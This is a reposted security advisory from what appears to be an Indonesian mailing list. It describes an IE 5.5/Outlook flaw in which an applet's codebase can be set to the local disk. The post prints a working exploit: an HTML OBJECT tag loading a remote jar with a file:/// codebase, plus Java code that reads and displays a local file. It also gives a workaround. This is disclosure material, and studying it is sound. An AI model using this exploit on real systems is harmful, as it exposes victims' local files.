IE/Outlook java security vulnerability exposes local files ------------------------------------------------------------------------ SUMMARY There is a security vulnerability in IE 5.5/Outlook/Outlook Express, which allows reading of local files, arbitrary Intranet URLs and local directory structure after viewing a web page or reading a malicious HTML message. DETAILS The lies in the ability of specifying arbitrary codebase for an applet loaded from <OBJECT> tag and a jar file. Applets may read URLs from their codebase and communicate with hosts from the same codebase. The following code: <OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590> <PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar"> <PARAM NAME="CODEBASE" VALUE="file:///c:/"> <PARAM NAME="URL" VALUE="file:///c:/test.txt"> </OBJECT> Sets the applet's codebase to file:///c:/. This is not a Java language problem and supposedly not a problem in Microsoft's VM but rather a problem in the way codebase is set by IE. Exploit: The code is: ---------javacodebase1.html------------------------------------------ <OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590> <PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar"> <PARAM NAME="CODEBASE" VALUE="file:///c:/"> <PARAM NAME="URL" VALUE="file:///c:/test.txt"> </OBJECT> --------------------------------------------------------------------- --------gjavacodebase.java------------------------------------------- ..... try { u = new URL(getParameter("URL")); InputStream is=u.openStream(); byte ba[]=new byte[1000]; int l=is.read(ba); InputStream os=u.openConnection().getInputStream(); String s1=new String(ba,0,l); print(u.toString()); print(s1); } ...... --------------------------------------------------------------------- Workaround: Disable Java. Demonstration: A live demonstration is available at: <http://www.guninski.com/javacodebase1.html> http://www.guninski.com/javacodebase1.html -- Eko Sulistiono MIKRODATA & AntiVirus Media Web: http://www.mikrodata.co.id/ WAP: http://www.mikrodata.co.id/wap/index.wml This message contains no viruses. Guaranteed by AVP. ------------------------------------------------------------------------ Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM) Informasi : http:[EMAIL PROTECTED] Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/ WAP : http://mikrodata.co.id/wap/index.wml Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA. Termasuk rubrik-rubrik yang ada di media lain. Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah tindakan kriminal. Please check with the latest AVP update before you ask about virus: ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip
